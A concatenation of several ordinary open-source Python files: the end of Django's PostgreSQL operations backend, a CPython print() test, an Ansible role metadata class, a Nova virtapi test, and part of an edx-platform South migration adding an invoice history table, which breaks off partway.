"""
modifiers = []
if timedelta.days:
modifiers.append(u'%s days' % timedelta.days)
if timedelta.seconds:
modifiers.append(u'%s seconds' % timedelta.seconds)
if timedelta.microseconds:
modifiers.append(u'%s microseconds' % timedelta.microseconds)
mods = u' '.join(modifiers)
conn = u' %s ' % connector
return u'(%s)' % conn.join([sql, u'interval \'%s\'' % mods])
def date_trunc_sql(self, lookup_type, field_name):
# http://www.postgresql.org/docs/8.0/static/functions-datetime.html#FUNCTIONS-DATETIME-TRUNC
return "DATE_TRUNC('%s', %s)" % (lookup_type, field_name)
def deferrable_sql(self):
return " DEFERRABLE INITIALLY DEFERRED"
def lookup_cast(self, lookup_type):
lookup = '%s'
# Cast text lookups to text to allow things like filter(x__contains=4)
if lookup_type in ('iexact', 'contains', 'icontains', 'startswith',
'istartswith', 'endswith', 'iendswith'):
lookup = "%s::text"
# Use UPPER(x) for case-insensitive lookups; it's faster.
if lookup_type in ('iexact', 'icontains', 'istartswith', 'iendswith'):
lookup = 'UPPER(%s)' % lookup
return lookup
def field_cast_sql(self, db_type):
if db_type == 'inet':
return 'HOST(%s)'
return '%s'
def last_insert_id(self, cursor, table_name, pk_name):
# Use pg_get_serial_sequence to get the underlying sequence name
# from the table name and column name (available since PostgreSQL 8)
cursor.execute("SELECT CURRVAL(pg_get_serial_sequence('%s','%s'))" % (
self.quote_name(table_name), pk_name))
return cursor.fetchone()[0]
def no_limit_value(self):
return None
def quote_name(self, name):
if name.startswith('"') and name.endswith('"'):
return name # Quoting once is enough.
return '"%s"' % name
def sql_flush(self, style, tables, sequences):
if tables:
if self.postgres_version[0:2] >= (8,1):
# Postgres 8.1+ can do 'TRUNCATE x, y, z...;'. In fact, it *has to*
# in order to be able to truncate tables referenced by a foreign
# key in any other table. The result is a single SQL TRUNCATE
# statement.
sql = ['%s %s;' % \
(style.SQL_KEYWORD('TRUNCATE'),
style.SQL_FIELD(', '.join([self.quote_name(table) for table in tables]))
)]
else:
# Older versions of Postgres can't do TRUNCATE in a single call, so
# they must use a simple delete.
sql = ['%s %s %s;' % \
(style.SQL_KEYWORD('DELETE'),
style.SQL_KEYWORD('FROM'),
style.SQL_FIELD(self.quote_name(table))
) for table in tables]
# 'ALTER SEQUENCE sequence_name RESTART WITH 1;'... style SQL statements
# to reset sequence indices
for sequence_info in sequences:
table_name = sequence_info['table']
column_name = sequence_info['column']
if not (column_name and len(column_name) > 0):
# This will be the case if it's an m2m using an autogenerated
# intermediate table (see BaseDatabaseIntrospection.sequence_list)
column_name = 'id'
sql.append("%s setval(pg_get_serial_sequence('%s','%s'), 1, false);" % \
(style.SQL_KEYWORD('SELECT'),
style.SQL_TABLE(self.quote_name(table_name)),
style.SQL_FIELD(column_name))
)
return sql
else:
return []
def sequence_reset_sql(self, style, model_list):
from django.db import models
output = []
qn = self.quote_name
for model in model_list:
# Use `coalesce` to set the sequence for each model to the max pk value if there are records,
# or 1 if there are none. Set the `is_called` property (the third argument to `setval`) to true
# if there are records (as the max pk value is already in use), otherwise set it to false.
# Use pg_get_serial_sequence to get the underlying sequence name from the table name
# and column name (available since PostgreSQL 8)
for f in model._meta.local_fields:
if isinstance(f, models.AutoField):
output.append("%s setval(pg_get_serial_sequence('%s','%s'), coalesce(max(%s), 1), max(%s) %s null) %s %s;" % \
(style.SQL_KEYWORD('SELECT'),
style.SQL_TABLE(qn(model._meta.db_table)),
style.SQL_FIELD(f.column),
style.SQL_FIELD(qn(f.column)),
style.SQL_FIELD(qn(f.column)),
style.SQL_KEYWORD('IS NOT'),
style.SQL_KEYWORD('FROM'),
style.SQL_TABLE(qn(model._meta.db_table))))
break # Only one AutoField is allowed per model, so don't bother continuing.
for f in model._meta.many_to_many:
if not f.rel.through:
output.append("%s setval(pg_get_serial_sequence('%s','%s'), coalesce(max(%s), 1), max(%s) %s null) %s %s;" % \
(style.SQL_KEYWORD('SELECT'),
style.SQL_TABLE(qn(f.m2m_db_table())),
style.SQL_FIELD('id'),
style.SQL_FIELD(qn('id')),
style.SQL_FIELD(qn('id')),
style.SQL_KEYWORD('IS NOT'),
style.SQL_KEYWORD('FROM'),
style.SQL_TABLE(qn(f.m2m_db_table()))))
return output
def savepoint_create_sql(self, sid):
return "SAVEPOINT %s" % sid
def savepoint_commit_sql(self, sid):
return "RELEASE SAVEPOINT %s" % sid
def savepoint_rollback_sql(self, sid):
return "ROLLBACK TO SAVEPOINT %s" % sid
def prep_for_iexact_query(self, x):
return x
def check_aggregate_support(self, aggregate):
"""Check that the backend fully supports the provided aggregate.
The population and sample statistics (STDDEV_POP, STDDEV_SAMP,
VAR_POP, VAR_SAMP) were first implemented in Postgres 8.2.
The implementation of population statistics (STDDEV_POP and VAR_POP)
under Postgres 8.2 - 8.2.4 is known to be faulty. Raise
NotImplementedError if this is the database in use.
"""
if aggregate.sql_function in ('STDDEV_POP', 'STDDEV_SAMP', 'VAR_POP', 'VAR_SAMP'):
if self.postgres_version[0:2] < (8,2):
raise NotImplementedError('PostgreSQL does not support %s prior to version 8.2. Please upgrade your version of PostgreSQL.' % aggregate.sql_function)
if aggregate.sql_function in ('STDDEV_POP', 'VAR_POP'):
if self.postgres_version[0:2] == (8,2):
if self.postgres_version[2] is None or self.postgres_version[2] <= 4:
raise NotImplementedError('PostgreSQL 8.2 to 8.2.4 is known to have a faulty implementation of %s. Please upgrade your version of PostgreSQL.' % aggregate.sql_function)
def max_name_length(self):
"""
Returns the maximum length of an identifier.
Note that the maximum length of an identifier is 63 by default, but can
be changed by recompiling PostgreSQL after editing the NAMEDATALEN
macro in src/include/pg_config_manual.h .
This implementation simply returns 63, but can easily be overridden by a
custom database backend that inherits most of its behavior from this one.
"""
return 63
| bsd-3-clause |
mancoast/CPythonPyc_test | fail/311_test_print.py | 8 | 3846 | """Test correct operation of the print function.
"""
# In 2.6, this gives us the behavior we want. In 3.0, it has
# no function, but it still must parse correctly.
from __future__ import print_function
import unittest
from test import support
import sys
try:
# 3.x
from io import StringIO
except ImportError:
# 2.x
from StringIO import StringIO
NotDefined = object()
# A dispatch table all 8 combinations of providing
# sep, end, and file
# I use this machinery so that I'm not just passing default
# values to print, I'm eiher passing or not passing in the
# arguments
dispatch = {
(False, False, False):
lambda args, sep, end, file: print(*args),
(False, False, True):
lambda args, sep, end, file: print(file=file, *args),
(False, True, False):
lambda args, sep, end, file: print(end=end, *args),
(False, True, True):
lambda args, sep, end, file: print(end=end, file=file, *args),
(True, False, False):
lambda args, sep, end, file: print(sep=sep, *args),
(True, False, True):
lambda args, sep, end, file: print(sep=sep, file=file, *args),
(True, True, False):
lambda args, sep, end, file: print(sep=sep, end=end, *args),
(True, True, True):
lambda args, sep, end, file: print(sep=sep, end=end, file=file, *args),
}
# Class used to test __str__ and print
class ClassWith__str__:
def __init__(self, x):
self.x = x
def __str__(self):
return self.x
class TestPrint(unittest.TestCase):
def check(self, expected, args,
sep=NotDefined, end=NotDefined, file=NotDefined):
# Capture sys.stdout in a StringIO. Call print with args,
# and with sep, end, and file, if they're defined. Result
# must match expected.
# Look up the actual function to call, based on if sep, end, and file
# are defined
fn = dispatch[(sep is not NotDefined,
end is not NotDefined,
file is not NotDefined)]
with support.captured_stdout() as t:
fn(args, sep, end, file)
self.assertEqual(t.getvalue(), expected)
def test_print(self):
def x(expected, args, sep=NotDefined, end=NotDefined):
# Run the test 2 ways: not using file, and using
# file directed to a StringIO
self.check(expected, args, sep=sep, end=end)
# When writing to a file, stdout is expected to be empty
o = StringIO()
self.check('', args, sep=sep, end=end, file=o)
# And o will contain the expected output
self.assertEqual(o.getvalue(), expected)
x('\n', ())
x('a\n', ('a',))
x('None\n', (None,))
x('1 2\n', (1, 2))
x('1 2\n', (1, ' ', 2))
x('1*2\n', (1, 2), sep='*')
x('1 s', (1, 's'), end='')
x('a\nb\n', ('a', 'b'), sep='\n')
x('1.01', (1.0, 1), sep='', end='')
x('1*a*1.3+', (1, 'a', 1.3), sep='*', end='+')
x('a\n\nb\n', ('a\n', 'b'), sep='\n')
x('\0+ +\0\n', ('\0', ' ', '\0'), sep='+')
x('a\n b\n', ('a\n', 'b'))
x('a\n b\n', ('a\n', 'b'), sep=None)
x('a\n b\n', ('a\n', 'b'), end=None)
x('a\n b\n', ('a\n', 'b'), sep=None, end=None)
x('*\n', (ClassWith__str__('*'),))
x('abc 1\n', (ClassWith__str__('abc'), 1))
# # 2.x unicode tests
# x(u'1 2\n', ('1', u'2'))
# x(u'u\1234\n', (u'u\1234',))
# x(u' abc 1\n', (' ', ClassWith__str__(u'abc'), 1))
# errors
self.assertRaises(TypeError, print, '', sep=3)
self.assertRaises(TypeError, print, '', end=3)
self.assertRaises(AttributeError, print, '', file='')
def test_main():
support.run_unittest(TestPrint)
if __name__ == "__main__":
test_main()
| gpl-3.0 |
bjoshua/ansible | lib/ansible/playbook/role/metadata.py | 51 | 3177 | # (c) 2014 Michael DeHaan, <michael@ansible.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
from six import iteritems, string_types
from ansible.errors import AnsibleParserError
from ansible.playbook.attribute import Attribute, FieldAttribute
from ansible.playbook.base import Base
from ansible.playbook.helpers import load_list_of_roles
from ansible.playbook.role.include import RoleInclude
__all__ = ['RoleMetadata']
class RoleMetadata(Base):
'''
This class wraps the parsing and validation of the optional metadata
within each Role (meta/main.yml).
'''
_allow_duplicates = FieldAttribute(isa='bool', default=False)
_dependencies = FieldAttribute(isa='list', default=[])
_galaxy_info = FieldAttribute(isa='GalaxyInfo')
def __init__(self, owner=None):
self._owner = owner
super(RoleMetadata, self).__init__()
@staticmethod
def load(data, owner, variable_manager=None, loader=None):
'''
Returns a new RoleMetadata object based on the datastructure passed in.
'''
if not isinstance(data, dict):
raise AnsibleParserError("the 'meta/main.yml' for role %s is not a dictionary" % owner.get_name())
m = RoleMetadata(owner=owner).load_data(data, variable_manager=variable_manager, loader=loader)
return m
def _load_dependencies(self, attr, ds):
'''
This is a helper loading function for the dependencies list,
which returns a list of RoleInclude objects
'''
if ds is None:
ds = []
current_role_path = None
if self._owner:
current_role_path = os.path.dirname(self._owner._role_path)
return load_list_of_roles(ds, current_role_path=current_role_path, variable_manager=self._variable_manager, loader=self._loader)
def _load_galaxy_info(self, attr, ds):
'''
This is a helper loading function for the galaxy info entry
in the metadata, which returns a GalaxyInfo object rather than
a simple dictionary.
'''
return ds
def serialize(self):
return dict(
allow_duplicates = self._allow_duplicates,
dependencies = self._dependencies,
)
def deserialize(self, data):
setattr(self, 'allow_duplicates', data.get('allow_duplicates', False))
setattr(self, 'dependencies', data.get('dependencies', []))
| gpl-3.0 |
DirectXMan12/nova-hacking | nova/tests/compute/test_virtapi.py | 5 | 5056 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2012 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mox
from nova.compute import manager as compute_manager
from nova import context
from nova import db
from nova import test
from nova.virt import fake
from nova.virt import virtapi
class VirtAPIBaseTest(test.TestCase, test.APICoverage):
cover_api = virtapi.VirtAPI
def setUp(self):
super(VirtAPIBaseTest, self).setUp()
self.context = context.RequestContext('fake-user', 'fake-project')
self.set_up_virtapi()
def set_up_virtapi(self):
self.virtapi = virtapi.VirtAPI()
def assertExpected(self, method, *args, **kwargs):
self.assertRaises(NotImplementedError,
getattr(self.virtapi, method), self.context,
*args, **kwargs)
def test_instance_update(self):
self.assertExpected('instance_update', 'fake-uuid',
dict(host='foohost'))
def test_aggregate_get_by_host(self):
self.assertExpected('aggregate_get_by_host', 'fake-host', key=None)
def test_aggregate_metadata_add(self):
self.assertExpected('aggregate_metadata_add', {'id': 'fake'},
{'foo': 'bar'}, set_delete=False)
def test_aggregate_metadata_delete(self):
self.assertExpected('aggregate_metadata_delete', {'id': 'fake'},
'foo')
def test_security_group_get_by_instance(self):
self.assertExpected('security_group_get_by_instance',
{'uuid': 'fake-id'})
def test_security_group_rule_get_by_security_group(self):
self.assertExpected('security_group_rule_get_by_security_group',
{'id': 'fake-id'})
def test_provider_fw_rule_get_all(self):
self.assertExpected('provider_fw_rule_get_all')
def test_agent_build_get_by_triple(self):
self.assertExpected('agent_build_get_by_triple',
'fake-hv', 'gnu/hurd', 'fake-arch')
def test_instance_type_get(self):
self.assertExpected('instance_type_get',
'fake-instance-type')
class FakeVirtAPITest(VirtAPIBaseTest):
cover_api = fake.FakeVirtAPI
def set_up_virtapi(self):
self.virtapi = fake.FakeVirtAPI()
def assertExpected(self, method, *args, **kwargs):
if method == 'instance_update':
# NOTE(danms): instance_update actually becomes the other variant
# in FakeVirtAPI
db_method = 'instance_update_and_get_original'
else:
db_method = method
self.mox.StubOutWithMock(db, db_method)
if method in ('aggregate_metadata_add', 'aggregate_metadata_delete',
'security_group_rule_get_by_security_group'):
# NOTE(danms): FakeVirtAPI will convert the first argument to
# argument['id'], so expect that in the actual db call
e_args = tuple([args[0]['id']] + list(args[1:]))
elif method in ('test_security_group_get_by_instance'):
e_args = tuple([args[0]['uuid']] + list(args[1:]))
else:
e_args = args
getattr(db, db_method)(self.context, *e_args, **kwargs).AndReturn(
'it worked')
self.mox.ReplayAll()
result = getattr(self.virtapi, method)(self.context, *args, **kwargs)
self.assertEqual(result, 'it worked')
class FakeCompute(object):
def __init__(self):
self.conductor_api = mox.MockAnything()
self.db = mox.MockAnything()
def _instance_update(self, context, instance_uuid, **kwargs):
# NOTE(danms): Fake this behavior from compute/manager::ComputeManager
return self.conductor_api.instance_update(context,
instance_uuid, kwargs)
class ComputeVirtAPITest(VirtAPIBaseTest):
cover_api = compute_manager.ComputeVirtAPI
def set_up_virtapi(self):
self.compute = FakeCompute()
self.virtapi = compute_manager.ComputeVirtAPI(self.compute)
def assertExpected(self, method, *args, **kwargs):
self.mox.StubOutWithMock(self.compute.conductor_api, method)
getattr(self.compute.conductor_api, method)(
self.context, *args, **kwargs).AndReturn('it worked')
self.mox.ReplayAll()
result = getattr(self.virtapi, method)(self.context, *args, **kwargs)
self.assertEqual(result, 'it worked')
| apache-2.0 |
J861449197/edx-platform | lms/djangoapps/shoppingcart/migrations/0027_add_invoice_history.py | 102 | 22387 | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'InvoiceHistory'
db.create_table('shoppingcart_invoicehistory', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('timestamp', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, db_index=True, blank=True)),
('invoice', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['shoppingcart.Invoice'])),
('snapshot', self.gf('django.db.models.fields.TextField')(blank=True)),
))
db.send_create_signal('shoppingcart', ['InvoiceHistory'])
def backwards(self, orm):
# Deleting model 'InvoiceHistory'
db.delete_table('shoppingcart_invoicehistory')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'shoppingcart.certificateitem': {
'Meta': {'object_name': 'CertificateItem', '_ormbases': ['shoppingcart.OrderItem']},
'course_enrollment': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['student.CourseEnrollment']"}),
'course_id': ('xmodule_django.models.CourseKeyField', [], {'max_length': '128', 'db_index': 'True'}),
'mode': ('django.db.models.fields.SlugField', [], {'max_length': '50'}),
'orderitem_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['shoppingcart.OrderItem']", 'unique': 'True', 'primary_key': 'True'})
},
'shoppingcart.coupon': {
'Meta': {'object_name': 'Coupon'},
'code': ('django.db.models.fields.CharField', [], {'max_length': '32', 'db_index': 'True'}),
'course_id': ('xmodule_django.models.CourseKeyField', [], {'max_length': '255'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2015, 2, 8, 0, 0)'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
'description': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'expiration_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'percentage_discount': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
'shoppingcart.couponredemption': {
'Meta': {'object_name': 'CouponRedemption'},
'coupon': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['shoppingcart.Coupon']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'order': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['shoppingcart.Order']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'shoppingcart.courseregcodeitem': {
'Meta': {'object_name': 'CourseRegCodeItem', '_ormbases': ['shoppingcart.OrderItem']},
'course_id': ('xmodule_django.models.CourseKeyField', [], {'max_length': '128', 'db_index': 'True'}),
'mode': ('django.db.models.fields.SlugField', [], {'default': "'honor'", 'max_length': '50'}),
'orderitem_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['shoppingcart.OrderItem']", 'unique': 'True', 'primary_key': 'True'})
},
'shoppingcart.courseregcodeitemannotation': {
'Meta': {'object_name': 'CourseRegCodeItemAnnotation'},
'annotation': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'course_id': ('xmodule_django.models.CourseKeyField', [], {'unique': 'True', 'max_length': '128', 'db_index': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'shoppingcart.courseregistrationcode': {
'Meta': {'object_name': 'CourseRegistrationCode'},
'code': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32', 'db_index': 'True'}),
'course_id': ('xmodule_django.models.CourseKeyField', [], {'max_length': '255', 'db_index': 'True'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime(2015, 2, 8, 0, 0)'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'created_by_user'", 'to': "orm['auth.User']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'invoice': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['shoppingcart.Invoice']", 'null': 'True'}),
'invoice_item': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['shoppingcart.CourseRegistrationCodeInvoiceItem']", 'null': 'True'}),
'mode_slug': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True'}),
'order': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'purchase_order'", 'null': 'True', 'to': "orm['shoppingcart.Order']"})
},
'shoppingcart.courseregistrationcodeinvoiceitem': {
'Meta': {'object_name': 'CourseRegistrationCodeInvoiceItem', '_ormbases': ['shoppingcart.InvoiceItem']},
'course_id': ('xmodule_django.models.CourseKeyField', [], {'max_length': '128', 'db_index': 'True'}),
'invoiceitem_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['shoppingcart.InvoiceItem']", 'unique': 'True', 'primary_key': 'True'})
},
'shoppingcart.donation': {
'Meta': {'object_name': 'Donation', '_ormbases': ['shoppingcart.OrderItem']},
'course_id': ('xmodule_django.models.CourseKeyField', [], {'max_length': '255', 'db_index': 'True'}),
'donation_type': ('django.db.models.fields.CharField', [], {'default': "'general'", 'max_length': '32'}),
'orderitem_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['shoppingcart.OrderItem']", 'unique': 'True', 'primary_key': 'True'})
},
'shoppingcart.donationconfiguration': {
'Meta': {'object_name': 'DonationConfiguration'},
'change_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'changed_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True', 'on_delete': 'models.PROTECT'}),
'enabled': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'shoppingcart.invoice': {
'Meta': {'object_name': 'Invoice'},
'address_line_1': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'address_line_2': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'address_line_3': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'city': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'company_contact_email': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'company_contact_name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'company_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
'country': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'course_id': ('xmodule_django.models.CourseKeyField', [], {'max_length': '255', 'db_index': 'True'}),
'created': ('model_utils.fields.AutoCreatedField', [], {'default': 'datetime.datetime.now'}),
'customer_reference_number': ('django.db.models.fields.CharField', [], {'max_length': '63', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'internal_reference': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'is_valid': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'modified': ('model_utils.fields.AutoLastModifiedField', [], {'default': 'datetime.datetime.now'}),
'recipient_email': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'recipient_name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'total_amount': ('django.db.models.fields.FloatField', [], {}),
'zip': ('django.db.models.fields.CharField', [], {'max_length': '15', 'null': 'True'})
},
'shoppingcart.invoicehistory': {
'Meta': {'object_name': 'InvoiceHistory'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'invoice': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['shoppingcart.Invoice']"}),
'snapshot': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'timestamp': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'db_index': 'True', 'blank': 'True'})
},
'shoppingcart.invoiceitem': {
'Meta': {'object_name': 'InvoiceItem'},
'created': ('model_utils.fields.AutoCreatedField', [], {'default': 'datetime.datetime.now'}),
'currency': ('django.db.models.fields.CharField', [], {'default': "'usd'", 'max_length': '8'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'invoice': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['shoppingcart.Invoice']"}),
'modified': ('model_utils.fields.AutoLastModifiedField', [], {'default': 'datetime.datetime.now'}),
'qty': ('django.db.models.fields.IntegerField', [], {'default': '1'}),
'unit_price': ('django.db.models.fields.DecimalField', [], {'default': '0.0', 'max_digits': '30', 'decimal_places': '2'})
},
'shoppingcart.invoicetransaction': {
'Meta': {'object_name': 'InvoiceTransaction'},
'amount': ('django.db.models.fields.DecimalField', [], {'default': '0.0', 'max_digits': '30', 'decimal_places': '2'}),
'comments': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'created': ('model_utils.fields.AutoCreatedField', [], {'default': 'datetime.datetime.now'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
'currency': ('django.db.models.fields.CharField', [], {'default': "'usd'", 'max_length': '8'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'invoice': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['shoppingcart.Invoice']"}),
'last_modified_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'last_modified_by_user'", 'to': "orm['auth.User']"}),
'modified': ('model_utils.fields.AutoLastModifiedField', [], {'default': 'datetime.datetime.now'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'started'", 'max_length': '32'})
},
'shoppingcart.order': {
'Meta': {'object_name': 'Order'},
'bill_to_cardtype': ('django.db.models.fields.CharField', [], {'max_length': '32', 'blank': 'True'}),
'bill_to_ccnum': ('django.db.models.fields.CharField', [], {'max_length': '8', 'blank': 'True'}),
'bill_to_city': ('django.db.models.fields.CharField', [], {'max_length': '64', 'blank': 'True'}),
'bill_to_country': ('django.db.models.fields.CharField', [], {'max_length': '64', 'blank': 'True'}),
'bill_to_first': ('django.db.models.fields.CharField', [], {'max_length': '64', 'blank': 'True'}),
'bill_to_last': ('django.db.models.fields.CharField', [], {'max_length': '64', 'blank': 'True'}),
'bill_to_postalcode': ('django.db.models.fields.CharField', [], {'max_length': '16', 'blank': 'True'}),
'bill_to_state': ('django.db.models.fields.CharField', [], {'max_length': '8', 'blank': 'True'}),
'bill_to_street1': ('django.db.models.fields.CharField', [], {'max_length': '128', 'blank': 'True'}),
'bill_to_street2': ('django.db.models.fields.CharField', [], {'max_length': '128', 'blank': 'True'}),
'company_contact_email': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'company_contact_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'company_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'currency': ('django.db.models.fields.CharField', [], {'default': "'usd'", 'max_length': '8'}),
'customer_reference_number': ('django.db.models.fields.CharField', [], {'max_length': '63', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'order_type': ('django.db.models.fields.CharField', [], {'default': "'personal'", 'max_length': '32'}),
'processor_reply_dump': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'purchase_time': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'recipient_email': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'recipient_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'refunded_time': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'cart'", 'max_length': '32'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'shoppingcart.orderitem': {
'Meta': {'object_name': 'OrderItem'},
'created': ('model_utils.fields.AutoCreatedField', [], {'default': 'datetime.datetime.now'}),
'currency': ('django.db.models.fields.CharField', [], {'default': "'usd'", 'max_length': '8'}),
'fulfilled_time': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'db_index': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
